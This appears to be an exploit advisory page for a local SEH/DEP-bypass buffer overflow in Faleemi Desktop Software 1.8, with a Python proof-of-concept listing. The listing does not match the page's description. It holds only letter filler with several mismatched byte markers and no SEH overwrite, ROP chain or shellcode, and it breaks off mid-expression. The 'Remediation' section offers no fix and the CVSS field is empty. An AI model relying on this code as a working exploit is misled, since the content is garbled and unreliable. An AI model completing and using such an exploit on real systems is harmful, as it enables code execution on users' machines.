# Faleemi Desktop Software 1.8 Local Buffer Overflow SEH DEP Bypass

## Vulnerability overview

Faleemi Desktop Software 1.8 contains a local buffer overflow in its System Setup dialog. By entering a crafted payload in the "Save Path for Snapshot and Record" field, an attacker can trigger the overflow, overwrite the Structured Exception Handler (SEH) record to bypass DEP (Data Execution Prevention), and finally reach arbitrary code execution through a chain of ROP gadgets.

## Affected scope

- Affected software: Faleemi Desktop Software
- Affected versions: <= 1.8.0
- Vulnerability type: Local Buffer Overflow
- Severity: High
- CVSS vector:

## Remediation

- Official link: Official Product Homepage
- Reference: ExploitDB-46269

## Exploit code (POC)

```python
#!/usr/bin/env python3
# Exploit Title: Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH DEP Bypass)
# Date: 2019-12-04
# Exploit Author: bzyo
# Vendor Homepage: https://www.faleemi.com/
# Software Link: https://www.faleemi.com/download.html
# Version: 1.8
# Tested on: Windows 10 Pro x64
# CVE : CVE-2019-25691

import sys
import os

# Check if python3 is installed
if sys.version_info[0] < 3:
    print("[-] Python 3 is required to run this exploit.")
    sys.exit(1)

# Check if the target file exists
if not os.path.exists("faleemi.exe"):
    print("[-] faleemi.exe not found. Please download it from the vendor's website.")
    sys.exit(1)

# Generate the payload: a 2048-byte filler followed by lettered 100-byte
# blocks, each followed by a 4-byte marker of the same letter
payload = (
    b"A" * 2048 + b"\x41\x41\x41\x41"
    + b"B" * 100 + b"\x42\x42\x42\x42"
    + b"C" * 100 + b"\x43\x43\x43\x43"
    + b"D" * 100 + b"\x44\x44\x44\x44"
    + b"E" * 100 + b"\x45\x45\x45\x45"
    + b"F" * 100 + b"\x46\x46\x46\x46"
    + b"G" * 100 + b"\x47\x47\x47\x47"
    + b"H" * 100 + b"\x48\x48\x48\x48"
    + b"I" * 100 + b"\x49\x49\x49\x49"
    + b"J" * 100 + b"\x4A\x4A\x4A\x4A"
    + b"K" * 100 + b"\x4B\x4B\x4B\x4B"
    + b"L" * 100 + b"\x4C\x4C\x4C\x4C"
    + b"M" * 100 + b"\x4D\x4D\x4D\x4D"
    + b"N" * 100 + b"\x4E\x4E\x4E\x4E"
    + b"O" * 100 + b"\x4F\x4F\x4F\x4F"
    + b"P" * 100 + b"\x50\x50\x50\x50"
    + b"Q" * 100 + b"\x51\x51\x51\x51"
    + b"R" * 100 + b"\x52\x52\x52\x52"
    + b"S" * 100 + b"\x53\x53\x53\x53"
    + b"T" * 100 + b"\x54\x54\x54\x54"
    + b"U" * 100 + b"\x55\x55\x55\x55"
    + b"V" * 100 + b"\x56\x56\x56\x56"
    + b"W" * 100 + b"\x57\x57\x57\x57"
    + b"X" * 100 + b"\x58\x58\x58\x58"
    + b"Y" * 100 + b"\x59\x59\x59\x59"
    + b"Z" * 100 + b"\x5A\x5A\x5A\x5A"
    + b"{" * 100 + b"\x5B\x5B\x5B\x5B"
    + b"}" * 100 + b"\x5C\x5C\x5C\x5C"
    # the listing on this page breaks off at this point
)
```